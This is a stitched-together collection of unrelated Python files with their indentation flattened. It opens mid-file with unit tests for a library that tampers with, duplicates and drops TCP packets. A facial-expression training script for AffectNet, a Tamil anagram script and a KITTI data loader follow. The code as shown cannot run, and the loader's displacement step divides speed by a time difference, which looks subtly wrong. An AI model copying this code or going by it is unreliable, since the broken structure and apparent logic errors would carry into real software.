assert str(a) == str(base_a)
assert len(a) == 1
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|", logging.getLogger("test"))
base_a.add_action(tamper2)
assert str(a) == str(base_a)
assert len(a) == 2
base_a.add_action(tamper3)
base_a.add_action(tamper4)
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},),),)-|", logging.getLogger("test"))
assert str(a) == str(base_a)
assert len(a) == 4
base_t = actions.trigger.Trigger("field", "flags", "TCP")
base_a = actions.tree.ActionTree("out", trigger=base_t)
duplicate = actions.duplicate.DuplicateAction()
assert a.parse("[TCP:flags:0]-duplicate-|", logger)
base_a.add_action(duplicate)
assert str(a) == str(base_a)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="A")
tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate.left = tamper
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},)-|", logger)
assert str(a) == str(base_a)
duplicate.right = tamper2
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-|", logger)
assert str(a) == str(base_a)
tamper2.left = tamper3
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:A},))-|", logger)
assert str(a) == str(base_a)
strategy = actions.utils.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-| \/", logger)
assert strategy
assert len(strategy.out_actions[0]) == 3
assert len(strategy.in_actions) == 0
assert not a.parse("[]", logger) # No valid trigger
assert not a.parse("[TCP:flags:0]-", logger) # No valid ending "|"
assert not a.parse("[TCP:]-|", logger) # invalid trigger
assert not a.parse("[TCP:flags:0]-foo-|", logger) # Non-existent action
assert not a.parse("[TCP:flags:0]--|", logger) # Empty action
assert not a.parse("[TCP:flags:0]-duplicate(,,,)-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate()))-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate(((()-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate(,))))-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-drop(duplicate,)-|", logger) # Terminal action with children
assert not a.parse("[TCP:flags:0]-drop(duplicate,duplicate)-|", logger) # Terminal action with children
assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(,duplicate)-|", logger) # Non-branching action with right child
assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,duplicate)-|", logger) # Non-branching action with children
def test_tree():
"""
Tests basic tree functionality.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
duplicate = actions.duplicate.DuplicateAction()
a.add_action(None)
a.add_action(tamper)
assert a.get_slots() == 1
a.add_action(tamper2)
assert a.get_slots() == 1
a.add_action(duplicate)
assert a.get_slots() == 2
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
drop = actions.drop.DropAction()
a.add_action(drop)
assert a.get_slots() == 0
add_success = a.add_action(tamper)
assert not add_success
assert a.get_slots() == 0
rep = ""
for s in a.string_repr(a.action_root):
rep += s
assert rep == "drop"
print(str(a))
assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:seq:corrupt},)-|", logging.getLogger("test"))
for act in a:
print(str(a))
assert len(a) == 2
assert a.get_slots() == 2
for _ in range(100):
assert str(a.get_rand_action("out", request="DropAction")) == "drop"
def test_remove():
"""
Tests remove
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
assert not a.remove_action(tamper)
a.add_action(tamper)
assert a.remove_action(tamper)
a.add_action(tamper)
a.add_action(tamper2)
a.add_action(tamper3)
assert a.remove_action(tamper2)
assert tamper2 not in a
assert tamper.left == tamper3
assert not tamper.right
assert len(a) == 2
a = actions.tree.ActionTree("out", trigger=t)
duplicate = actions.duplicate.DuplicateAction()
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
a.add_action(tamper)
assert a.action_root == tamper
duplicate.left = tamper2
duplicate.right = tamper3
a.add_action(duplicate)
assert len(a) == 4
assert a.remove_action(duplicate)
assert duplicate not in a
assert tamper.left == tamper2
assert not tamper.right
assert len(a) == 2
a.parse("[TCP:flags:A]-|", logging.getLogger("test"))
assert not a.remove_one(), "Cannot remove one with no action root"
def test_len():
"""
Tests length calculation.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
assert len(a) == 0, "__len__ returned wrong length"
a.add_action(tamper)
assert len(a) == 1, "__len__ returned wrong length"
a.add_action(tamper)
assert len(a) == 1, "__len__ returned wrong length"
a.add_action(tamper2)
assert len(a) == 2, "__len__ returned wrong length"
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
assert len(a) == 3, "__len__ returned wrong length"
def test_contains():
"""
Tests contains method
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
assert not a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper)
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
add_success = a.add_action(tamper)
assert not add_success, "added duplicate action"
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
a.remove_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
remove_success = a.remove_action(tamper)
assert remove_success
assert not a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper3)
assert a.contains(tamper3), "contains incorrect behavior"
assert len(a) == 2, "len incorrect return"
remove_success = a.remove_action(tamper2)
assert remove_success
def test_iter():
"""
Tests iterator.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
assert a.add_action(tamper)
assert a.add_action(tamper2)
assert not a.add_action(tamper)
for node in a:
print(node)
def test_run():
"""
Tests running packets through the chain.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
packet = layers.packet.Packet(IP()/TCP())
a.add_action(tamper)
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 1
assert None not in packets
assert packets[0].get("TCP", "flags") == "S"
a.add_action(tamper2)
print(str(a))
packet = layers.packet.Packet(IP()/TCP())
assert not a.add_action(tamper), "tree added duplicate action"
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 1
assert None not in packets
assert packets[0].get("TCP", "flags") == "R"
print(str(a))
a.remove_action(tamper2)
a.remove_action(tamper)
a.add_action(duplicate)
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
assert packets[0][TCP].flags == "RA"
assert packets[1][TCP].flags == "RA"
print(str(a))
duplicate.left = tamper
duplicate.right = tamper2
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
print("ABUT TO RUN")
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
print(str(a))
print(str(packets[0]))
print(str(packets[1]))
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "R"
print(str(a))
tamper.left = duplicate2
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 3
assert None not in packets
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "S"
assert packets[2][TCP].flags == "R"
print(str(a))
tamper2.left = drop
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "S"
print(str(a))
assert a.remove_action(duplicate2)
tamper.left = actions.drop.DropAction()
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
    packets = a.run(packet, logger)
assert len(packets) == 0
print(str(a))
a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S},))-|", logger)
packet = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(packet, logger)
packets = a.run(packet, logger)
assert len(packets) == 3
assert packets[0][TCP].flags == "R"
assert packets[1][TCP].flags == "S"
assert packets[2][TCP].flags == "A"
def test_index():
"""
Tests index
"""
a = actions.tree.ActionTree("out")
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="F")
assert a.add_action(tamper)
assert a[0] == tamper
assert not a[1]
assert a.add_action(tamper2)
assert a[0] == tamper
assert a[1] == tamper2
assert a[-1] == tamper2
assert not a[10]
assert a.add_action(tamper3)
assert a[-1] == tamper3
assert not a[-11]
def test_mate():
"""
Tests mate primitive
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert not a.choose_one()
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
other_a = actions.tree.ActionTree("out", trigger=t)
assert not a.mate(other_a), "Can't mate empty trees"
assert a.add_action(tamper)
assert other_a.add_action(tamper2)
assert a.choose_one() == tamper
assert other_a.choose_one() == tamper2
assert a.get_parent(tamper) == (None, None)
assert other_a.get_parent(tamper2) == (None, None)
assert a.add_action(duplicate)
assert a.get_parent(duplicate) == (tamper, "left")
duplicate.right = drop
assert a.get_parent(drop) == (duplicate, "right")
assert other_a.add_action(duplicate2)
# Test mating a full tree with a full tree
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|"
assert str(other_a) == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate,)-|"
assert a.swap(duplicate, other_a, duplicate2)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
assert str(other_a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate(,drop),)-|"
assert len(a) == 2
assert len(other_a) == 3
assert duplicate2 not in other_a
assert duplicate not in a
assert tamper.left == duplicate2
assert tamper2.left == duplicate
assert other_a.get_parent(duplicate) == (tamper2, "left")
assert a.get_parent(duplicate2) == (tamper, "left")
assert other_a.get_parent(drop) == (duplicate, "right")
assert a.get_parent(None) == (None, None)
# Test mating two trees with just root nodes
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert not a.choose_one()
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
other_a = actions.tree.ActionTree("out", trigger=t)
assert not a.mate(other_a)
assert a.add_action(duplicate)
assert other_a.add_action(duplicate2)
assert a.mate(other_a)
assert a.action_root == duplicate2
assert other_a.action_root == duplicate
assert not duplicate.left and not duplicate.right
assert not duplicate2.left and not duplicate2.right
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
assert not node.left == other_node
assert not node.right == other_node
# Test mating two trees where one is empty
assert a.remove_action(duplicate2)
# This should swap the duplicate action to be the action root of the other tree
assert str(a) == "[TCP:flags:0]-|"
assert str(other_a) == "[TCP:flags:0]-duplicate-|"
assert a.mate(other_a)
assert not other_a.action_root
assert a.action_root == duplicate
assert len(a) == 1
assert len(other_a) == 0
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
if other_node:
assert not node.left == other_node
assert not node.right == other_node
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|", logger)
drop = a.action_root.left.right
assert str(drop) == "drop"
# Note that this will return a valid ActionTree, but because it is empty,
    # it is technically a falsy value, as its length is 0
assert other_a.parse("[TCP:flags:0]-|", logger) == other_a
a.swap(drop, other_a, None)
assert other_a.action_root == drop
assert not a.action_root.left.right
assert str(other_a) == "[TCP:flags:0]-drop-|"
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
other_a.swap(drop, a, a.action_root.left)
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
if other_node:
assert not node.left == other_node
assert not node.right == other_node
assert str(other_a) == "[TCP:flags:0]-duplicate-|"
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,)-|"
a.parse("[TCP:flags:0]-drop-|", logger)
other_a.parse("[TCP:flags:0]-duplicate(drop,drop)-|", logger)
a_drop = a.action_root
other_duplicate = other_a.action_root
a.swap(a_drop, other_a, other_duplicate)
print(str(a))
print(str(other_a))
assert str(other_a) == "[TCP:flags:0]-drop-|"
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
drop2 = actions.drop.DropAction()
drop3 = actions.drop.DropAction()
a = actions.tree.ActionTree("out", trigger=t)
a.add_action(duplicate)
a.add_action(drop)
a.add_action(drop2)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
assert a.get_slots() == 0
other_a = actions.tree.ActionTree("out", trigger=t)
other_a.add_action(drop3)
a.swap(drop, other_a, drop3)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
a.swap(drop3, other_a, drop)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
assert a.mate(other_a)
def test_choose_one():
"""
Tests choose_one functionality
"""
a = actions.tree.ActionTree("out")
drop = actions.drop.DropAction()
assert not a.choose_one()
assert a.add_action(drop)
assert a.choose_one() == drop
assert a.remove_action(drop)
assert not a.choose_one()
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
assert a.choose_one() == duplicate
duplicate.left = drop
assert a.choose_one() in [duplicate, drop]
# Make sure that both actions get chosen
chosen = set()
for i in range(0, 10000):
act = a.choose_one()
chosen.add(act)
assert chosen == set([duplicate, drop])
|
39611
|
import os
import glob
from tqdm import tqdm
import argparse
from PIL import Image
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.utils.data as data
from torchvision import transforms, datasets
from networks.dan import DAN
def parse_args():
parser = argparse.ArgumentParser()
    parser.add_argument('--aff_path', type=str, default='datasets/AffectNet/', help='AffectNet dataset path.')
parser.add_argument('--batch_size', type=int, default=256, help='Batch size.')
parser.add_argument('--lr', type=float, default=0.0001, help='Initial learning rate for adam.')
parser.add_argument('--workers', default=8, type=int, help='Number of data loading workers.')
parser.add_argument('--epochs', type=int, default=40, help='Total training epochs.')
    parser.add_argument('--num_head', type=int, default=4, help='Number of attention heads.')
    parser.add_argument('--num_class', type=int, default=8, help='Number of classes.')
return parser.parse_args()
class AffectNet(data.Dataset):
def __init__(self, aff_path, phase, use_cache = True, transform = None):
self.phase = phase
self.transform = transform
self.aff_path = aff_path
if use_cache:
cache_path = os.path.join(aff_path,'affectnet.csv')
if os.path.exists(cache_path):
df = pd.read_csv(cache_path)
else:
df = self.get_df()
df.to_csv(cache_path)
else:
df = self.get_df()
self.data = df[df['phase'] == phase]
self.file_paths = self.data.loc[:, 'img_path'].values
self.label = self.data.loc[:, 'label'].values
_, self.sample_counts = np.unique(self.label, return_counts=True)
# print(f' distribution of {phase} samples: {self.sample_counts}')
def get_df(self):
train_path = os.path.join(self.aff_path,'train_set/')
val_path = os.path.join(self.aff_path,'val_set/')
data = []
for anno in glob.glob(train_path + 'annotations/*_exp.npy'):
idx = os.path.basename(anno).split('_')[0]
img_path = os.path.join(train_path,f'images/{idx}.jpg')
label = int(np.load(anno))
data.append(['train',img_path,label])
for anno in glob.glob(val_path + 'annotations/*_exp.npy'):
idx = os.path.basename(anno).split('_')[0]
img_path = os.path.join(val_path,f'images/{idx}.jpg')
label = int(np.load(anno))
data.append(['val',img_path,label])
return pd.DataFrame(data = data,columns = ['phase','img_path','label'])
def __len__(self):
return len(self.file_paths)
def __getitem__(self, idx):
path = self.file_paths[idx]
image = Image.open(path).convert('RGB')
label = self.label[idx]
if self.transform is not None:
image = self.transform(image)
return image, label
class AffinityLoss(nn.Module):
def __init__(self, device, num_class=8, feat_dim=512):
super(AffinityLoss, self).__init__()
self.num_class = num_class
self.feat_dim = feat_dim
self.gap = nn.AdaptiveAvgPool2d(1)
self.device = device
self.centers = nn.Parameter(torch.randn(self.num_class, self.feat_dim).to(device))
def forward(self, x, labels):
x = self.gap(x).view(x.size(0), -1)
batch_size = x.size(0)
distmat = torch.pow(x, 2).sum(dim=1, keepdim=True).expand(batch_size, self.num_class) + \
torch.pow(self.centers, 2).sum(dim=1, keepdim=True).expand(self.num_class, batch_size).t()
distmat.addmm_(x, self.centers.t(), beta=1, alpha=-2)
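        # distmat now holds the squared Euclidean distances ||x_i - c_j||^2,
        # built via the expansion ||x||^2 + ||c||^2 - 2 * x @ centers^T.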
classes = torch.arange(self.num_class).long().to(self.device)
labels = labels.unsqueeze(1).expand(batch_size, self.num_class)
mask = labels.eq(classes.expand(batch_size, self.num_class))
dist = distmat * mask.float()
dist = dist / self.centers.var(dim=0).sum()
loss = dist.clamp(min=1e-12, max=1e+12).sum() / batch_size
return loss
class PartitionLoss(nn.Module):
def __init__(self, ):
super(PartitionLoss, self).__init__()
def forward(self, x):
num_head = x.size(1)
if num_head > 1:
var = x.var(dim=1).mean()
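            # loss = log(1 + num_head / var): lower variance across the attention
            # heads yields a larger penalty, pushing the heads to diverge.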
loss = torch.log(1+num_head/var)
else:
loss = 0
return loss
class ImbalancedDatasetSampler(data.sampler.Sampler):
def __init__(self, dataset, indices: list = None, num_samples: int = None):
self.indices = list(range(len(dataset))) if indices is None else indices
self.num_samples = len(self.indices) if num_samples is None else num_samples
df = pd.DataFrame()
df["label"] = self._get_labels(dataset)
df.index = self.indices
df = df.sort_index()
label_to_count = df["label"].value_counts()
weights = 1.0 / label_to_count[df["label"]]
self.weights = torch.DoubleTensor(weights.to_list())
# self.weights = self.weights.clamp(min=1e-5)
def _get_labels(self, dataset):
if isinstance(dataset, datasets.ImageFolder):
return [x[1] for x in dataset.imgs]
elif isinstance(dataset, torch.utils.data.Subset):
return [dataset.dataset.imgs[i][1] for i in dataset.indices]
else:
raise NotImplementedError
def __iter__(self):
return (self.indices[i] for i in torch.multinomial(self.weights, self.num_samples, replacement=True))
def __len__(self):
return self.num_samples
def run_training():
args = parse_args()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.is_available():
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.enabled = True
model = DAN(num_class=args.num_class, num_head=args.num_head)
model.to(device)
data_transforms = transforms.Compose([
transforms.Resize((224, 224)),
transforms.RandomHorizontalFlip(),
transforms.RandomApply([
transforms.RandomAffine(20, scale=(0.8, 1), translate=(0.2, 0.2)),
], p=0.7),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
transforms.RandomErasing(),
])
# train_dataset = AffectNet(args.aff_path, phase = 'train', transform = data_transforms) # loading dynamically
train_dataset = datasets.ImageFolder(f'{args.aff_path}/train', transform = data_transforms) # loading statically
if args.num_class == 7: # ignore the 8-th class
idx = [i for i in range(len(train_dataset)) if train_dataset.imgs[i][1] != 7]
train_dataset = data.Subset(train_dataset, idx)
print('Whole train set size:', train_dataset.__len__())
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size = args.batch_size,
num_workers = args.workers,
sampler=ImbalancedDatasetSampler(train_dataset),
shuffle = False,
pin_memory = True)
data_transforms_val = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
# val_dataset = AffectNet(args.aff_path, phase = 'val', transform = data_transforms_val) # loading dynamically
val_dataset = datasets.ImageFolder(f'{args.aff_path}/val', transform = data_transforms_val) # loading statically
if args.num_class == 7: # ignore the 8-th class
idx = [i for i in range(len(val_dataset)) if val_dataset.imgs[i][1] != 7]
val_dataset = data.Subset(val_dataset, idx)
print('Validation set size:', val_dataset.__len__())
val_loader = torch.utils.data.DataLoader(val_dataset,
batch_size = args.batch_size,
num_workers = args.workers,
shuffle = False,
pin_memory = True)
criterion_cls = torch.nn.CrossEntropyLoss().to(device)
criterion_af = AffinityLoss(device, num_class=args.num_class)
criterion_pt = PartitionLoss()
params = list(model.parameters()) + list(criterion_af.parameters())
optimizer = torch.optim.Adam(params,args.lr,weight_decay = 0)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma = 0.6)
best_acc = 0
for epoch in tqdm(range(1, args.epochs + 1)):
running_loss = 0.0
correct_sum = 0
iter_cnt = 0
model.train()
for (imgs, targets) in train_loader:
iter_cnt += 1
optimizer.zero_grad()
imgs = imgs.to(device)
targets = targets.to(device)
out,feat,heads = model(imgs)
loss = criterion_cls(out,targets) + criterion_af(feat,targets) + criterion_pt(heads)
loss.backward()
optimizer.step()
            running_loss += loss.item()  # .item() detaches the scalar so the running sum does not retain the autograd graph
_, predicts = torch.max(out, 1)
correct_num = torch.eq(predicts, targets).sum()
correct_sum += correct_num
acc = correct_sum.float() / float(train_dataset.__len__())
running_loss = running_loss/iter_cnt
tqdm.write('[Epoch %d] Training accuracy: %.4f. Loss: %.3f. LR %.6f' % (epoch, acc, running_loss,optimizer.param_groups[0]['lr']))
with torch.no_grad():
running_loss = 0.0
iter_cnt = 0
bingo_cnt = 0
sample_cnt = 0
model.eval()
for imgs, targets in val_loader:
imgs = imgs.to(device)
targets = targets.to(device)
out,feat,heads = model(imgs)
loss = criterion_cls(out,targets) + criterion_af(feat,targets) + criterion_pt(heads)
running_loss += loss
iter_cnt+=1
_, predicts = torch.max(out, 1)
correct_num = torch.eq(predicts,targets)
bingo_cnt += correct_num.sum().cpu()
sample_cnt += out.size(0)
running_loss = running_loss/iter_cnt
scheduler.step()
acc = bingo_cnt.float()/float(sample_cnt)
acc = np.around(acc.numpy(),4)
best_acc = max(acc,best_acc)
tqdm.write("[Epoch %d] Validation accuracy:%.4f. Loss:%.3f" % (epoch, acc, running_loss))
tqdm.write("best_acc:" + str(best_acc))
if args.num_class == 7 and acc > 0.65:
torch.save({'iter': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),},
os.path.join('checkpoints', "affecnet7_epoch"+str(epoch)+"_acc"+str(acc)+".pth"))
tqdm.write('Model saved.')
elif args.num_class == 8 and acc > 0.62:
torch.save({'iter': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),},
os.path.join('checkpoints', "affecnet8_epoch"+str(epoch)+"_acc"+str(acc)+".pth"))
tqdm.write('Model saved.')
if __name__ == "__main__":
run_training()
|
39641
|
import codecs
from solthiruthi.dictionary import *
from tamil import wordutils
TVU, TVU_size = DictionaryBuilder.create(TamilVU)
ag, ag2 = wordutils.anagrams_in_dictionary(TVU)
with codecs.open("demo.txt", "w", "utf-8") as fp:
itr = 1
for k, c in ag:
v = ag2[k]
fp.write("%03d) %s\n" % (itr, " | ".join(v)))
itr += 1
|
39647
|
from __future__ import division
import numpy as np
from path import Path
from imageio import imread
from skimage.transform import resize as imresize
from kitti_util import pose_from_oxts_packet, generate_depth_map, read_calib_file, transform_from_rot_trans
from datetime import datetime
class KittiRawLoader(object):
def __init__(self,
dataset_dir,
static_frames_file=None,
img_height=128,
img_width=416,
min_disp=0.2,
get_depth=False,
get_pose=False,
depth_size_ratio=1):
dir_path = Path(__file__).realpath().dirname()
test_scene_file = dir_path/'test_scenes.txt'
self.from_speed = static_frames_file is None
if static_frames_file is not None:
self.collect_static_frames(static_frames_file)
with open(test_scene_file, 'r') as f:
test_scenes = f.readlines()
self.test_scenes = [t[:-1] for t in test_scenes]
self.dataset_dir = dataset_dir
self.img_height = img_height
self.img_width = img_width
self.cam_ids = ['02', '03']
self.date_list = ['2011_09_26', '2011_09_28', '2011_09_29', '2011_09_30', '2011_10_03']
self.min_disp = min_disp
self.get_depth = get_depth
self.get_pose = get_pose
self.depth_size_ratio = depth_size_ratio
self.collect_train_folders()
def collect_static_frames(self, static_frames_file):
with open(static_frames_file, 'r') as f:
frames = f.readlines()
self.static_frames = {}
for fr in frames:
if fr == '\n':
continue
date, drive, frame_id = fr.split(' ')
            curr_fid = '%.10d' % (int(frame_id[:-1]))
if drive not in self.static_frames.keys():
self.static_frames[drive] = []
self.static_frames[drive].append(curr_fid)
def collect_train_folders(self):
self.scenes = []
for date in self.date_list:
drive_set = (self.dataset_dir/date).dirs()
for dr in drive_set:
if dr.name[:-5] not in self.test_scenes:
self.scenes.append(dr)
def collect_scenes(self, drive):
train_scenes = []
for c in self.cam_ids:
oxts = sorted((drive/'oxts'/'data').files('*.txt'))
with open(drive/'oxts'/'timestamps.txt', 'r') as f:
times = [datetime.strptime(time_string[:-4], "%Y-%m-%d %H:%M:%S.%f") for time_string in f.readlines()]
scene_data = {'cid': c,
'dir': drive,
'speed': [],
'time': [t.timestamp() for t in times],
'frame_id': [],
'pose': [],
'rel_path': drive.name + '_' + c}
scale = None
origin = None
imu2velo = read_calib_file(drive.parent/'calib_imu_to_velo.txt')
velo2cam = read_calib_file(drive.parent/'calib_velo_to_cam.txt')
cam2cam = read_calib_file(drive.parent/'calib_cam_to_cam.txt')
velo2cam_mat = transform_from_rot_trans(velo2cam['R'], velo2cam['T'])
imu2velo_mat = transform_from_rot_trans(imu2velo['R'], imu2velo['T'])
cam_2rect_mat = transform_from_rot_trans(cam2cam['R_rect_00'], np.zeros(3))
imu2cam = cam_2rect_mat @ velo2cam_mat @ imu2velo_mat
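            # imu2cam chains IMU -> velodyne -> camera -> rectified camera, so an
            # IMU pose can be expressed directly in the rectified camera frame below.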
for n, f in enumerate(oxts):
metadata = np.genfromtxt(f)
speed = metadata[8:11]
scene_data['speed'].append(speed)
scene_data['frame_id'].append('{:010d}'.format(n))
lat = metadata[0]
if scale is None:
scale = np.cos(lat * np.pi / 180.)
pose_matrix = pose_from_oxts_packet(metadata[:6], scale)
if origin is None:
origin = pose_matrix
odo_pose = imu2cam @ np.linalg.inv(origin) @ pose_matrix @ np.linalg.inv(imu2cam)
scene_data['pose'].append(odo_pose[:3])
sample = self.load_image(scene_data, 0)
if sample is None:
return []
scene_data['P_rect'] = self.get_P_rect(scene_data, sample[1], sample[2])
scene_data['intrinsics'] = scene_data['P_rect'][:, :3]
train_scenes.append(scene_data)
return train_scenes
def get_scene_imgs(self, scene_data):
def construct_sample(scene_data, i, frame_id):
sample = {"img": self.load_image(scene_data, i)[0], "id": frame_id}
if self.get_depth:
sample['depth'] = self.get_depth_map(scene_data, i)
if self.get_pose:
sample['pose'] = scene_data['pose'][i]
return sample
if self.from_speed:
cum_displacement = np.zeros(3)
for i, (speed1, speed2, t1, t2) in enumerate(zip(scene_data['speed'][1:],
scene_data['speed'][:-1],
scene_data['time'][1:],
scene_data['time'][:-1])):
print(speed1, speed2, t1, t2)
cum_displacement += 0.5*(speed1 + speed2) / (t2-t1)
disp_mag = np.linalg.norm(cum_displacement)
if disp_mag > self.min_disp:
frame_id = scene_data['frame_id'][i]
yield construct_sample(scene_data, i, frame_id)
cum_displacement *= 0
else: # from static frame file
drive = str(scene_data['dir'].name)
for (i, frame_id) in enumerate(scene_data['frame_id']):
if (drive not in self.static_frames.keys()) or (frame_id not in self.static_frames[drive]):
yield construct_sample(scene_data, i, frame_id)
def get_P_rect(self, scene_data, zoom_x, zoom_y):
calib_file = scene_data['dir'].parent/'calib_cam_to_cam.txt'
filedata = read_calib_file(calib_file)
P_rect = np.reshape(filedata['P_rect_' + scene_data['cid']], (3, 4))
P_rect[0] *= zoom_x
P_rect[1] *= zoom_y
return P_rect
